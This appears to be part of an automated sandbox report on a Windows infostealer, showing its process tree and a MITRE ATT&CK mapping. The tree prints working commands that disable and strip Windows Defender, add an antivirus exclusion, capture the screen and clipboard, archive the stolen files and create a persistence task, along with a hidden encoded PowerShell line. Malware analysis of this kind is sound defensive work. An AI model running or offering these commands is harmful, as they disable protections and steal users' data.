      C:\Windows\system32\cmd.exe /c " powershell.exe -nop -w hidden -encodedCommand UwBFAFgAIAAkAFsARQBtAGIAZABkAF0AIAAtAFMAbwB1AHIAYwBlACAAVwBpAG4AZABvAHcAcwAuAE0AaQBzAGMAcgBvAHMAbwBmAHQALgBJAE4AVwA7ACAASQBuAHQAUwBUAFIAdQBDAFQAIABbAFMAbwBjAGsAZQB0AF0AIAAtAEUAdgBlAG4AdAAgAE4AYQBtAGUAZAAgAEUAVgBBAEsAUwBQAF8AQgB5AHAAQQBTAFMAMAA= "
      4⤵
      PID:1200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:2196
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:2344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:4600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_nH1QoAKib.zip' -Force""
      4⤵
      PID:1480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_nH1QoAKib.zip' -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2400
- C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5024
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /Create /TN "Usermode Disk Driver Host" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCC29.tmp" /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2412 -ip 2412
1⤵
PID:3160

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4248

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:4868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery